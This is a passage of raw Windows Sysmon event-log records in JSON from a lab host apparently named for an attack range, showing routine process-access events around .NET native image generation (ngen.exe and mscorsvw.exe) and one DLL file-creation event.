ll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6794,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.636\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010AA5C0D00}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.636","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010AA5C0D00}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6795,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.652\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010AA5C0D00}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.652","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010AA5C0D00}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6796,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.683\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001048600D00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.683","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001048600D00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6797,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.683\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001048600D00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.683","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001048600D00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6798,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001048600D00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001048600D00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6799,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.777\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.777","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010715E0C00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6800,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010715E0C00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6801,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010715E0C00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6802,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:33.089\r\nProcessGuid: {A837DB8D-0487-5F25-0000-0010CA630D00}\r\nProcessId: 4464\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1170-0\\Microsoft.CSharp.dll\r\nCreationUtcTime: 2020-08-01 05:58:33.089","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 